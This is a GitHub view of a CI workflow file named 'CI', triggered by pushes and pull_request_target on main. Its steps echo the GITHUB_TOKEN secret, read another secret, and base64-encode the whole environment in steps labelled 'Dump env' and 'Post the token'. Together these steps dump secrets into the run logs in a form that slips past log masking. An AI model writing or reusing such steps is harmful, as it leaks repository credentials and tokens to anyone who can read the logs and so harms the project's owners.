Merge pull request #1 from allada/basdf #4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: CI | |
on: | |
push: | |
branches: [ main ] | |
pull_request_target: | |
branches: [ main ] | |
jobs: | |
auth: | |
# Add "id-token" with the intended permissions. | |
permissions: | |
id-token: write | |
actions: read | |
pull-requests: read | |
runs-on: ubuntu-latest | |
steps: | |
- uses: actions/checkout@master | |
with: | |
fetch-depth: 1 | |
- name: foo33 | |
run: set -x | |
- name: Dump env | |
run: FOO=${{ secrets.FOO }} | |
- name: GITHUB_TOKEN | |
run: echo ${{ secrets.GITHUB_TOKEN }} | |
- name: Dump env | |
run: env | base64 | |
- name: Post the token | |
run: | | |
env | base64 | |